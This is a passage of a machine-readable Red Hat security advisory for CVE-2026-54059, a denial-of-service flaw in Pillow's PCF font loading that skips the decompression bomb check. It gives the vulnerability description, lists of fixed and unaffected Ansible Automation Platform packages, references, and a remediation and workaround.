"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted PCF font data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Python Pillow library. The PcfFontFile._load_bitmaps() method reads glyph dimensions from the PCF METRICS section and passes them directly to Image.frombytes() without calling Image._decompression_bomb_check(). This allows crafted PCF font data to cause excessive memory allocation, leading to a denial of service condition. An attacker could exploit this by providing a specially crafted PCF font file to an application that uses Pillow\u0027s font loading functionality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54059"
},
{
"category": "external",
"summary": "RHBZ#2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54059"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x"
}
],
"release_date": "2026-07-06T18:46:09.433000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Do not load PCF fonts from untrusted sources. If PCF font loading is required, validate font file dimensions before passing them to Pillow, or upgrade to Pillow 12.3.0 or later which includes the fix for this vulnerability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
